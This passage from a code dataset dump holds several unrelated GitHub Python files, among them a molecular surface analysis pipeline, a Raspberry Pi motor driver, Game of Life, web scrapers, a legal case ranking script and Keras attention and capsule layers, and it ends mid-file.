alias.io.utilities import make_directory\nfrom alias.src.utilities import create_file_name, join_str_values\n\nlog = logging.getLogger(__name__)\n\n\ndef run_alias(trajectory, alias_options, checkpoint=None, topology=None):\n \"\"\"Peform ALIAS on given trajectory,\"\"\"\n\n # Obtain directory for trajectory and create analysis\n # directories\n traj_dir = os.path.dirname(trajectory)\n\n alias_dir = os.path.join(traj_dir, 'alias_analysis')\n data_dir = os.path.join(alias_dir, 'data')\n figure_dir = os.path.join(alias_dir, 'figures')\n\n make_directory(alias_dir)\n make_directory(data_dir)\n make_directory(figure_dir)\n\n # Parse file name to obtain base path for analysis\n # files\n file_name, _ = os.path.splitext(trajectory)\n file_name = os.path.basename(file_name)\n\n # Create a checkpoint file to save intrinsic surface\n # parameters\n if checkpoint is None:\n checkpoint = os.path.join(\n alias_dir, file_name + '_chk.json')\n\n surf_param = SurfaceParameters.from_json(checkpoint)\n\n log.info(\"Loading trajectory file {} using {} topology\".format(\n trajectory, topology))\n surf_param.load_traj_parameters(\n trajectory, topology)\n\n surf_param.select_residue()\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n surf_param.select_masses()\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n surf_param.select_center_of_mass()\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n com_ref = create_file_name([\n surf_param.com_mode,\n join_str_values(surf_param.com_sites)]\n )\n file_name = f\"{file_name}_{com_ref}\"\n\n surf_param.select_orientation_vector()\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n pos_dir = os.path.join(data_dir, 'pos')\n if not os.path.exists(pos_dir):\n os.mkdir(pos_dir)\n pos_file_name = os.path.join(pos_dir, file_name)\n\n try:\n mol_traj = load_npy(pos_file_name + f'{surf_param.n_frames}_mol_traj')\n cell_dim = load_npy(pos_file_name + f'{surf_param.n_frames}_cell_dim')\n except (FileNotFoundError, IOError):\n\n mol_traj, com_traj, cell_dim, mol_vec = batch_coordinate_loader(\n trajectory, surf_param, topology=topology\n )\n\n np.save(pos_file_name + f'{surf_param.n_frames}_mol_traj', mol_traj)\n np.save(pos_file_name + f'{surf_param.n_frames}_mol_vec', mol_vec)\n np.save(pos_file_name + f'{surf_param.n_frames}_com_traj', com_traj)\n np.save(pos_file_name + f'{surf_param.n_frames}_cell_dim', cell_dim)\n\n surf_param.select_mol_sigma()\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n surf_param.n_frames = mol_traj.shape[0]\n mean_cell_dim = np.mean(cell_dim, axis=0)\n surf_param.cell_dim = mean_cell_dim.tolist()\n\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n print(f\"Simulation cell xyz dimensions in Angstoms: \"\n f\"{surf_param.area}\\n\")\n\n print(\"\\n------STARTING INTRINSIC SAMPLING-------\\n\")\n print(\n \"Max wavelength = {:12.4f} sigma \"\n \"Min wavelength = {:12.4f} sigma\".format(\n surf_param.q_max, surf_param.q_min)\n )\n print(\"Max frequency qm = {:6d}\".format(\n surf_param.q_m))\n\n surf_param.select_pivot_density(file_name, data_dir)\n checkfile = surf_param.serialize()\n save_checkfile(checkfile, checkpoint)\n\n freq_range = range(1, surf_param.q_m+1)\n print(\"\\nResolution parameters:\")\n print(\"\\n{:12s} | {:12s} | {:12s}\".format(\n 'qu', \"lambda (sigma)\", \"lambda (nm)\"))\n print(\"-\" * 14 * 5)\n\n for q_u in freq_range:\n print(\"{:12d} | {:12.4f} | {:12.4f}\".format(\n q_u,\n surf_param.wavelength(q_u),\n surf_param.wavelength(q_u) * surf_param.mol_sigma / 10))\n print(\"\")\n\n create_intrinsic_surfaces(\n data_dir, file_name, mean_cell_dim, surf_param.q_m,\n surf_param.n_pivots, surf_param.phi,\n surf_param.mol_sigma, surf_param.n_frames,\n recon=surf_param.recon, ncube=surf_param.n_cube,\n vlim=surf_param.v_lim, tau=surf_param.tau,\n max_r=surf_param.max_r,\n ow_coeff=alias_options.ow_coeff,\n ow_recon=alias_options.ow_recon)\n\n create_intrinsic_positions_dxdyz(\n data_dir, file_name, surf_param.n_mol,\n surf_param.n_frames, surf_param.q_m,\n surf_param.n_pivots, surf_param.phi,\n mean_cell_dim,\n recon=surf_param.recon,\n ow_pos=alias_options.ow_intpos)\n\n create_intrinsic_den_curve_hist(\n data_dir, file_name, surf_param.q_m, surf_param.n_pivots,\n surf_param.phi, surf_param.n_frames,\n surf_param, surf_param.n_slice,\n surf_param.cell_dim,\n recon=surf_param.recon,\n ow_hist=alias_options.ow_hist)\n\n av_intrinsic_distributions(\n data_dir, file_name, surf_param.cell_dim,\n surf_param.n_slice, surf_param.q_m,\n surf_param.n_pivots, surf_param.phi,\n surf_param.n_frames, surf_param.n_frames,\n recon=surf_param.recon,\n ow_dist=alias_options.ow_dist)\n\n print(\"\\n---- ENDING PROGRAM ----\\n\")\n","repo_name":"franklongford/ALIAS","sub_path":"alias/src/run_alias.py","file_name":"run_alias.py","file_ext":"py","file_size_in_byte":5726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9608328771","text":"#!/usr/bin/python3\n\ndef max_integer(my_list=[]):\n\n if len(my_list) < 1:\n return None\n else:\n max_value = my_list[0]\n for index, num in enumerate(my_list):\n if num > max_value:\n max_value = num\n return max_value\n","repo_name":"gbabohernest/alx-higher_level_programming","sub_path":"0x03-python-data_structures/9-max_integer.py","file_name":"9-max_integer.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31089283361","text":"import numpy as np, os, cv2\nfrom functions import *\n\ndef parse_bundler(fname,img_shape):\n with open(fname, \"r\") as f:\n f.readline() # Read Bundler Version Line\n ncams = int(f.readline().split()[0])\n focals, Rt, pt_tracks = [], [], []\n for idx in range(ncams):\n focals.append(float(f.readline().split()[0]))\n R = np.array([list(map(float, f.readline().split())) for x in range(3)])\n t = np.array(list(map(float, f.readline().split())))\n Rt.append((R, t))\n while True:\n line = f.readline()\n if line is None or len(line.rstrip()) == 0:\n break\n X = np.array(list(map(float, line.split())))\n f.readline() # Ignore color values\n projs = f.readline().split()\n track = []\n for idx in range(int(projs[0])):\n frame = int(projs[1 + 4*idx]) # Ignore SIFT keypoint number\n x = img_shape[1]/2. + float(projs[3 + 4*idx])\n y = img_shape[0]/2. + float(projs[4 + 4*idx])\n track.append((frame, np.array([x,y], np.float64)))\n pt_tracks.append((X, track))\n return focals, Rt, pt_tracks\n\nclass Bundler:\n def __init__(self, bundler_file, img_files, img_shape, max_dim = 1000, frame_subset = None, cams_file = None):\n self.bundler_file = bundler_file\n self.img_shape = img_shape\n if max_dim is None:\n self.scale = 1.\n else:\n self.scale = min(float(max_dim+0.4) / np.array(self.img_shape[:2], np.float64))\n if not os.path.exists(self.bundler_file):\n raise RuntimeError(\"Bundler Path does not exist: {}\".format(self.bundler_file))\n focals, Rt, tracks = parse_bundler(self.bundler_file, self.img_shape)\n if len(focals) != len(img_files):\n raise RuntimeError(\"Bundler camera count ({0}) not agreeing with specified camera count ({1})\".format(len(focals),len(img_files)))\n frames_ok = np.nonzero(focals)[0].tolist()\n if frame_subset is not None:\n frames_ok = list(set(frames_ok).intersection(frame_subset))\n if cams_file is not None:\n if not os.path.exists(cams_file):\n raise RuntimeWarning(\"Not using good cams - File not found: {}\".format(cams_file))\n with open(cams_file,\"r\") as camf:\n good_cams = list(map(int,camf.readlines()))\n frames_ok = list(set(frames_ok).intersection(good_cams))\n frames_ok = sorted(frames_ok)\n self.img_files = [img_files[idx] for idx in frames_ok]\n self.imgs = dict([(f,cv2.resize(load_img(f,1), (0,0), fx=self.scale, fy=self.scale)) for f in self.img_files])\n if len(img_files) == 0:\n raise RuntimeError('SfM failed: No good cameras')\n self.Ks = np.zeros((len(img_files), 3, 3))\n self.Rs = np.zeros((len(img_files), 3, 3))\n self.ts = np.zeros((len(img_files), 3))\n for idx, frame in enumerate(frames_ok):\n K = -np.array([[-self.scale*focals[frame], 0., -0.5 + self.scale*self.img_shape[1]/2.,],[0., self.scale*focals[frame], -0.5 + self.scale*self.img_shape[0]/2.,],[0., 0., 1.]])\n self.Ks[idx] = K\n self.Rs[idx], self.ts[idx] = Rt[frame]\n\n def get_img(self, frame): return self.imgs[self.img_files[frame]].copy()\n \n def P(self, frame): return np.dot(self.Ks[frame], np.hstack([self.Rs[frame], self.ts[frame, :, np.newaxis]]))\n\n def center(self, frame): return -np.dot(self.Rs[frame].T, self.ts[frame])\n\n def project(self, frame, X):\n X = np.asarray(X.T)\n homog_X = np.concatenate([X, [1.]]) if X.ndim == 1 else np.vstack([X, np.ones(X.shape[1])])\n x = np.dot(self.P(frame), homog_X)\n y = x[:-1] / x[-1]\n return y.T\n\nif __name__ == \"__main__\":\n data_path = \"./Test Data/walden-tree3/\"\n Bundler(data_path + \"bundle/bundle.out\", get_jpg_files(data_path), (3888,2592,3))","repo_name":"abdur75648/COL-780-Assignments","sub_path":"Project/src/bundler.py","file_name":"bundler.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12449447670","text":"# 해시 _ 베스트엘범 _level3 (통과)\ndef solution(gen, play):\n # mulist = 장르 : [(재생수, 고유번호)]\n # total = 장르 : 총 재생수 \n answer, mulist, total = [], dict(), dict()\n g_len = len(gen) # 장르의 갯수\n\n for i in range(g_len) :\n if gen[i] in mulist: # 장르 key가 존재하면?\n mulist[gen[i]].append((play[i], i)) # (재생수, 고유번호)\n total[gen[i]] = total[gen[i]] + play[i] # 총 재생 수\n else : # 장르 key가 존재안하면?\n mulist[gen[i]] = [(play[i],i)]\n total[gen[i]] = play[i]\n \n # total 을 정렬 _ 재생수를 기준으로 내림차순 정렬\n total_sort_list = sorted(list(total.items()), key=lambda x :-x[1])\n\n for gen, j in total_sort_list:\n if len(mulist[gen]) == 1: # 조건1 ) 곡이 한개라면, 하나만 넣기 **\n answer.append(mulist[gen][0][1])\n else : \n # 조건2 ) 재생 수가 같다면 고유번호 낮은 순 넣기 **\n mulist[gen].sort(key=lambda x:(-x[0], x[1])) \n answer.append(mulist[gen][0][1])\n answer.append(mulist[gen][1][1])\n\n return answer\n\n# 조금 수정해보기\ndef solution2(gen, play):\n answer, mulist, total = [], dict(), dict()\n\n for i, (g, p) in enumerate(zip(gen, play)) : # enumerate와 zip을 사용하기 **\n if gen[i] in mulist: \n mulist[g].append((p,i)) \n total[g] += p # += 연산자 사용하기 **\n else : \n mulist[g] = [(p,i)]\n total[g] = p\n \n for gen, j in sorted(total.items(), key=lambda x :-x[1]):\n for p, go in sorted(mulist[gen], key=lambda x:(-x[0], x[1]))[:2] :\n answer.append(go)\n \n\n # print(answer)\n return answer\n\n\nif __name__ == '__main__':\n genres = [\"classic\", \"pop\", \"classic\", \"classic\", \"pop\"]\t\n plays = [500, 2500, 150, 800, 2500]\t\n solution(genres, plays)\n solution2(genres, plays)","repo_name":"yujing-kim/algorithm_coding_test","sub_path":"ps_python/programmers/2022/hash_bestalbum.py","file_name":"hash_bestalbum.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9857137631","text":"import RPi.GPIO as GPIO\n\nPWM_FREQ = 40\nLEFT_PWM = 11\nRIGHT_PWM = 3\n\nLEFT_DIR_1 = 13\nLEFT_DIR_2 = 15\n\nRIGHT_DIR_1 = 5\nRIGHT_DIR_2 = 7\n\nMAX_SPEED_LEFT = 0.1142 * 2\nMAX_SPEED_RIGHT = 0.1142 * 2\nMAX_ALLOWED_POWER = 0.5\nWHEELBASE = 0.2\n\n\nclass Driver(object):\n def __init__(self):\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(LEFT_PWM, GPIO.OUT)\n GPIO.setup(RIGHT_PWM, GPIO.OUT)\n GPIO.setup(LEFT_DIR_1, GPIO.OUT)\n GPIO.setup(LEFT_DIR_2, GPIO.OUT)\n GPIO.setup(RIGHT_DIR_1, GPIO.OUT)\n GPIO.setup(RIGHT_DIR_2, GPIO.OUT)\n\n self.left_pwm = GPIO.PWM(LEFT_PWM, PWM_FREQ)\n self.right_pwm = GPIO.PWM(RIGHT_PWM, PWM_FREQ)\n\n self.left_pwm.start(0)\n self.right_pwm.start(0)\n\n def set_speed(self, v_left, v_right):\n # Cap the max speed, so that you do not set values larger than allowed\n v_left = max(min(v_left, MAX_SPEED_LEFT), -MAX_SPEED_LEFT)\n v_right = max(min(v_right, MAX_SPEED_RIGHT), -MAX_SPEED_RIGHT)\n\n # Transform speed to PWM\n v_left /= MAX_SPEED_LEFT / MAX_ALLOWED_POWER\n v_right /= MAX_SPEED_RIGHT / MAX_ALLOWED_POWER\n\n # Controll the motor direction correctly\n if v_left >= 0:\n GPIO.output(LEFT_DIR_1, GPIO.HIGH)\n GPIO.output(LEFT_DIR_2, GPIO.LOW)\n else:\n GPIO.output(LEFT_DIR_1, GPIO.LOW)\n GPIO.output(LEFT_DIR_2, GPIO.HIGH)\n v_left = -v_left\n\n if v_right >= 0:\n GPIO.output(RIGHT_DIR_1, GPIO.HIGH)\n GPIO.output(RIGHT_DIR_2, GPIO.LOW)\n else:\n GPIO.output(RIGHT_DIR_1, GPIO.LOW)\n GPIO.output(RIGHT_DIR_2, GPIO.HIGH)\n v_right = -v_right\n\n # Actually set the duty for the motor\n self.left_pwm.ChangeDutyCycle(v_left)\n self.right_pwm.ChangeDutyCycle(v_right)\n\n def kill(self):\n # When killing reseting the pwm so the motors deinitialize\n self.left_pwm.stop()\n self.right_pwm.stop()\n GPIO.cleanup()\n","repo_name":"SimpleRobots/alice-hardware","sub_path":"pwm_drive.py","file_name":"pwm_drive.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6074655937","text":"import sys\n\nimport pygame\nfrom pygame.constants import QUIT\nfrom pygame.display import update\n\nfrom settings import Settings\nfrom cell import Cell\n\nclass GameOfLife:\n \"\"\"Overall class to manage game assets and behavior\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the game and create game resources\"\"\"\n pygame.init()\n self.settings = Settings()\n self.number_cells_x = int(input(\"Enter number of cells in a row: \"))\n self.cell_width = float(self.settings.screen_width // self.number_cells_x)\n #print(self.cell_width)\n self.number_cells_y = int(self.settings.screen_height // self.cell_width)\n\n self.screen = pygame.display.set_mode((self.settings.screen_width,self.settings.screen_height))\n pygame.display.set_caption(\"Game of Life\")\n\n self.cells = []\n self.to_be_updated = []\n self._create_cells()\n\n self.bg_colour = (self.settings.bg_colour)\n self.waiting = True\n \n def _create_cell(self,row_number,cell_number):\n \"\"\"Creates a cell at given position\"\"\"\n cell = Cell(self)\n cell.x = cell_number * self.cell_width\n cell.y = row_number * self.cell_width\n cell.rect.x = cell.x\n cell.rect.y = cell.y\n return cell\n\n def _create_cells(self):\n \"\"\"Create all cells\"\"\"\n for row_number in range(self.number_cells_y):\n row_cells = []\n row_to_be_updated = []\n for cell_number in range(self.number_cells_x):\n row_cells.append(self._create_cell(row_number,cell_number))\n row_to_be_updated.append(False)\n self.cells.append(row_cells)\n self.to_be_updated.append(row_to_be_updated)\n\n def run_game(self):\n \"\"\"Start the main loop for the game\"\"\"\n while True:\n self._check_event()\n self._update_screen()\n \n def _check_event(self):\n \"\"\"Checks for input from keyboard and mouse\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self.waiting = not self.waiting\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if self.waiting:\n x,y = pygame.mouse.get_pos()\n cell_addr_y = int(y/self.cell_width)\n cell_addr_x = int(x/self.cell_width)\n self.cells[cell_addr_y][cell_addr_x].update()\n\n def _get_neighbours(self,row_number,col_number):\n alive_neighbours = 0\n if row_number > 0:\n if self.cells[row_number-1][col_number].get_status():\n alive_neighbours += 1\n if row_number < self.number_cells_y -1:\n if self.cells[row_number+1][col_number].get_status():\n alive_neighbours += 1\n if col_number > 0:\n if self.cells[row_number][col_number-1].get_status():\n alive_neighbours += 1\n if col_number < self.number_cells_x -1:\n if self.cells[row_number][col_number+1].get_status():\n alive_neighbours += 1\n if row_number > 0 and col_number > 0:\n if self.cells[row_number-1][col_number-1].get_status():\n alive_neighbours += 1\n if row_number > 0 and col_number < self.number_cells_x -1:\n if self.cells[row_number-1][col_number+1].get_status():\n alive_neighbours += 1\n if row_number < self.number_cells_y -1 and col_number > 0:\n if self.cells[row_number+1][col_number-1].get_status():\n alive_neighbours += 1\n if row_number < self.number_cells_y -1 and col_number < self.number_cells_x -1:\n if self.cells[row_number+1][col_number+1].get_status():\n alive_neighbours += 1\n return alive_neighbours\n\n def _check_cells(self):\n \"\"\"Ckeck for all the cells that need to be updated once the game starts\"\"\"\n for row_number in range(self.number_cells_y):\n for col_number in range(self.number_cells_x):\n alive_neighbours = self._get_neighbours(row_number,col_number)\n \n self.to_be_updated[row_number][col_number] = False\n if self.cells[row_number][col_number].get_status():\n if alive_neighbours < 2:\n self.to_be_updated[row_number][col_number] = True\n elif alive_neighbours > 3:\n self.to_be_updated[row_number][col_number] = True\n else:\n if alive_neighbours == 3:\n self.to_be_updated[row_number][col_number] = True\n\n def _update_cells(self):\n \"\"\"Update cells once the game starts\"\"\"\n for row_number in range(self.number_cells_y):\n for col_number in range(self.number_cells_x):\n if self.to_be_updated[row_number][col_number]:\n self.cells[row_number][col_number].update()\n\n def _update_screen(self):\n \"\"\"Update all the cells and the background\"\"\"\n self.screen.fill(self.bg_colour)\n\n if not self.waiting:\n self._check_cells()\n self._update_cells()\n for row in self.cells:\n for cell in row:\n cell.draw_cell()\n \n pygame.display.flip()\n\nif __name__ == '__main__':\n gl = GameOfLife()\n gl.run_game()","repo_name":"adityakadoo/GameOfLife","sub_path":"game_of_life.py","file_name":"game_of_life.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29852607034","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://example.com'\nresponse = requests.get(url)\nsoup = BeautifulSoup(response.text, 'html.parser')\n\n# Extract and print all the links on the webpage\nlinks = soup.find_all('a')\nfor link in links:\n print(link.get('href'))\n","repo_name":"Daniel-Badura/Coding-Buddies-Community-Contributions","sub_path":"Python Basic Projects/webscrapper.py","file_name":"webscrapper.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"27836567704","text":"import json\nimport networkx as nx\nimport operator\n# base_dir = \"/Users/saurav/Desktop/OpenSoft/case_ranking/\"\n\ndef give_best_cases(case_dict, label_names):\n\t'''\n\t\tIn this function, give the input as a list of labels\n\t\tNote - the name of labels must match exactly with that in subject_to_case.txt\n\t'''\n\n # with open('subject_to_case.txt', 'r') as file:\n\t # json_data = file.read()\n\t\t# category_data = json.loads(json_data)\n\n\tcase_score = dict()\n\t# label_count = dict()\n\n\tfor labels in label_names:\n\t\ttry:\n\t\t\twith open(labels + '.txt', 'r') as file:\n\t\t\t\tjson_data = file.read()\n\t\t\t\tlabel_data = json.loads(json_data)\n\t\texcept:\n\t\t\tcontinue\n\t\tlength = len(label_data)\n\t\t# Cases present in label_data\n\t\tfor case in label_data:\n\t\t\tif case in case_dict:\n\t\t\t\tif case not in case_score:\n\t\t\t\t\tcase_score[case] = 0\n\t\t\t\telse:\n\t\t\t\t\tcase_score[case] = case_score[case] + label_data[case]*length\n\n\t# Assigning scores by using common citation graph\n\twith open('case_ranking.txt', 'r') as file:\n\t\tjson_data = file.read()\n\t\tcommon_case_ranking = json.loads(json_data)\n\n\tlength = len(common_case_ranking)\n\tfor case in case_score:\n\t\tif case in common_case_ranking:\n\t\t\tcase_score[case] = case_score[case] + common_case_ranking[case]*length\n\n\n\t# for case in case_score:\n\t# label_count[case] = len(case_dict[case]['categories'])\n\n\t# If case in case_score, then it exist surely in case_dict\n\tcase_score = sorted(case_score.items(), key = operator.itemgetter(1))\n\n\tcase_score_list = []\n\tfor case in case_score:\n\t\tcase_score_list.append(case[0])\n\n\tcase_score_list.sort(key = lambda z: case_dict[z]['value'])\n\tcase_score_list.reverse()\n\t\t\n\treturn case_score_list[:100]\n\nif __name__ == '__main__':\n\tn = int(input(\"Number of Categories\"))\n\tlabel_names = []\n\tfor i in range(n):\n\t\tlabel = input(\"Give Category\")\n\t\tlabel_names.append(label)\n\tprint(label_names)\n\tx = []\n\tx = give_best_cases(label_names)\n\tprint(x)\n","repo_name":"142ayushkumar/LegalAssistant","sub_path":"case_ranking/top_cases_given_labels.py","file_name":"top_cases_given_labels.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36540086851","text":"import pickle\nfrom oatd import ScrapeOatd\n\nx=1\n# current_user = getuser()\n\n\n# new_dict = dict(test_xx='test', other_la='other la')\n# new_dict.update(new_add='Geeks')\n# x = 1\n# url = 'https://oatd.org/oatd/search?q=eeg&form=basic'\nurl = 'https://oatd.org/oatd/search?q=eeg&form=basic&pubdate.facet=1991' # 88 result , 3 pages\noatd = ScrapeOatd()\nall_result = oatd.scrape_oatd(url)\nprint('complete scrape search result')\nall_website_scrape = oatd.loop_get_specific(all_result)\nprint('complete scrape specific page')\n\nx = 1\n\nwith open('oatd_complete_all_specific_page.pickle', 'wb') as handle:\n pickle.dump(all_website_scrape, handle, protocol=pickle.HIGHEST_PROTOCOL)\n print('complete saving')\n\n# html_oatd_specific_page\n# r = requests.get('https://oatd.org/oatd/record?record=handle\\:11012\\%2F16478&q=eeg')\n# page_soup = Soup(r.text, 'html.parser')","repo_name":"itayoron/Article_Search_Download_Automation","sub_path":"oatd_how_to_use.py","file_name":"oatd_how_to_use.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73118731027","text":"import pandas as pd\r\nimport os\r\n\r\n\r\nabspath = os.path.abspath(__file__)\r\ndname = os.path.dirname(abspath)\r\nos.chdir(dname)\r\n\r\n\r\nfilename = \"DebtGDP.csv\"\r\ndf = pd.read_csv(filename)\r\nqs = df['date'].str.replace(r'(\\d+) (Q\\d)', r'\\1-\\2')\r\ndf['date'] = pd.PeriodIndex(qs, freq='Q').to_timestamp()\r\n\r\nfilelocation = os.getcwd()\r\nprint(\"Saving as: [ \" + filename + \" ] in: [ \" + filelocation + \" ] \")\r\ndf.to_csv(filename)\r\n","repo_name":"lhkkennedy/lhkkennedy.github.io","sub_path":"html/Debt/quarter-to-date.py","file_name":"quarter-to-date.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13887005050","text":"#!python\nimport os \nimport pickle\n\nBASEDIR = '/p299/raw/2016/PM/split/'\n\nfiledict = dict()\nfilePathList = []\n\nfor root,dirs,files in os.walk(BASEDIR,topdown=True,followlinks=True):\n #if 'CA' not in root:\n # continue\n #if 'Reports' in root:\n # continue\n #if 'html' in root:\n # continue\n #print(root)\n for file in files:\n if not file.endswith('.gz'):\n continue\n fullpath = os.path.join(root,file)\n filePathList.append(fullpath)\n # fullid = file.split('_')[0]\n # if fullid not in filedict:\n # filedict[fullid] = []\n # if fullpath not in filedict[fullid]:\n # filedict[fullid].append(fullpath)\n print(\"add \",fullpath)\n\nprint('filedict size',len(filedict.keys()))\nprint('fullpath size',len(filePathList))\n\n#with open('filedict.pickle','wb') as fd:\n# pickle.dump(filedict,fd)\nwith open('pickle/filePathList.pickle','wb') as fpl:\n pickle.dump(filePathList,fpl)\nwith open('pickle/filePathList.xls','w') as fx:\n for file in filePathList:\n fx.write(file+'\\n')\n\n","repo_name":"seahurt/OGSManage","sub_path":"squery/scanFile.py","file_name":"scanFile.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5733252047","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nfrom abc import ABCMeta, abstractmethod\r\nfrom datetime import datetime\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pickle\r\nfrom keras.models import Model\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nfrom keras.layers import Layer, Activation\r\nfrom keras import initializers, regularizers, constraints\r\nfrom keras import backend as K\r\nfrom sklearn.model_selection import StratifiedKFold, train_test_split\r\nimport sys\r\nsys.path.append('utils/')\r\nimport config\r\n\r\n\r\n\r\n\r\n\r\nclass Attention(Layer):\r\n def __init__(self, step_dim=config.word_maxlen,\r\n W_regularizer=None, b_regularizer=None,\r\n W_constraint=None, b_constraint=None,\r\n bias=True, **kwargs):\r\n \"\"\"\r\n Keras Layer that implements an Attention mechanism for temporal data.\r\n Supports Masking.\r\n Follows the work of Raffel et al. [https://arxiv.org/abs/1512.08756]\r\n # Input shape\r\n 3D tensor with shape: `(samples, steps, features)`.\r\n # Output shape\r\n 2D tensor with shape: `(samples, features)`.\r\n :param kwargs:\r\n Just put it on top of an RNN Layer (GRU/LSTM/SimpleRNN) with return_sequences=True.\r\n The dimensions are inferred based on the output shape of the RNN.\r\n Example:\r\n model.add(LSTM(64, return_sequences=True))\r\n model.add(Attention())\r\n \"\"\"\r\n self.supports_masking = True\r\n # self.init = initializations.get('glorot_uniform')\r\n self.init = initializers.get('glorot_uniform')\r\n\r\n self.W_regularizer = regularizers.get(W_regularizer)\r\n self.b_regularizer = regularizers.get(b_regularizer)\r\n\r\n self.W_constraint = constraints.get(W_constraint)\r\n self.b_constraint = constraints.get(b_constraint)\r\n\r\n self.bias = bias\r\n self.step_dim = step_dim\r\n self.features_dim = 0\r\n super(Attention, self).__init__(**kwargs)\r\n\r\n def build(self, input_shape):\r\n assert len(input_shape) == 3\r\n\r\n self.W = self.add_weight((input_shape[-1],),\r\n initializer=self.init,\r\n name='{}_W'.format(self.name),\r\n regularizer=self.W_regularizer,\r\n constraint=self.W_constraint)\r\n self.features_dim = input_shape[-1]\r\n\r\n if self.bias:\r\n self.b = self.add_weight((input_shape[1],),\r\n initializer='zero',\r\n name='{}_b'.format(self.name),\r\n regularizer=self.b_regularizer,\r\n constraint=self.b_constraint)\r\n else:\r\n self.b = None\r\n\r\n self.built = True\r\n\r\n def compute_mask(self, input, input_mask=None):\r\n # do not pass the mask to the next layers\r\n return None\r\n\r\n def call(self, x, mask=None):\r\n # eij = K.dot(x, self.W) TF backend doesn't support it\r\n\r\n # features_dim = self.W.shape[0]\r\n # step_dim = x._keras_shape[1]\r\n\r\n features_dim = self.features_dim\r\n step_dim = self.step_dim\r\n\r\n eij = K.reshape(K.dot(K.reshape(x, (-1, features_dim)), K.reshape(self.W, (features_dim, 1))), (-1, step_dim))\r\n\r\n if self.bias:\r\n eij += self.b\r\n\r\n eij = K.tanh(eij)\r\n\r\n a = K.exp(eij)\r\n\r\n # apply mask after the exp. will be re-normalized next\r\n if mask is not None:\r\n # Cast the mask to floatX to avoid float64 upcasting in theano\r\n a *= K.cast(mask, K.floatx())\r\n\r\n # in some cases especially in the early stages of training the sum may be almost zero\r\n a /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())\r\n\r\n a = K.expand_dims(a)\r\n weighted_input = x * a\r\n return K.sum(weighted_input, axis=1)\r\n\r\n def compute_output_shape(self, input_shape):\r\n # return input_shape[0], input_shape[-1]\r\n return input_shape[0], self.features_dim\r\n\r\n\r\ndef squash(x, axis=-1):\r\n # s_squared_norm is really small\r\n # s_squared_norm = K.sum(K.square(x), axis, keepdims=True) + K.epsilon()\r\n # scale = K.sqrt(s_squared_norm)/ (0.5 + s_squared_norm)\r\n # return scale * x\r\n s_squared_norm = K.sum(K.square(x), axis, keepdims=True)\r\n scale = K.sqrt(s_squared_norm + K.epsilon())\r\n return x / scale\r\n\r\n\r\nclass Capsule(Layer):\r\n def __init__(self, num_capsule, dim_capsule, routings=3, kernel_size=(9, 1), share_weights=True,\r\n activation='default', **kwargs):\r\n super(Capsule, self).__init__(**kwargs)\r\n self.num_capsule = num_capsule\r\n self.dim_capsule = dim_capsule\r\n self.routings = routings\r\n self.kernel_size = kernel_size\r\n self.share_weights = share_weights\r\n if activation == 'default':\r\n self.activation = squash\r\n else:\r\n self.activation = Activation(activation)\r\n\r\n def build(self, input_shape):\r\n super(Capsule, self).build(input_shape)\r\n input_dim_capsule = input_shape[-1]\r\n if self.share_weights:\r\n self.W = self.add_weight(name='capsule_kernel',\r\n shape=(1, input_dim_capsule,\r\n self.num_capsule * self.dim_capsule),\r\n # shape=self.kernel_size,\r\n initializer='glorot_uniform',\r\n trainable=True)\r\n else:\r\n input_num_capsule = input_shape[-2]\r\n self.W = self.add_weight(name='capsule_kernel',\r\n shape=(input_num_capsule,\r\n input_dim_capsule,\r\n self.num_capsule * self.dim_capsule),\r\n initializer='glorot_uniform',\r\n trainable=True)\r\n\r\n def call(self, u_vecs):\r\n if self.share_weights:\r\n u_hat_vecs = K.conv1d(u_vecs, self.W)\r\n else:\r\n u_hat_vecs = K.local_conv1d(u_vecs, self.W, [1], [1])\r\n\r\n batch_size = K.shape(u_vecs)[0]\r\n input_num_capsule = K.shape(u_vecs)[1]\r\n u_hat_vecs = K.reshape(u_hat_vecs, (batch_size, input_num_capsule,\r\n 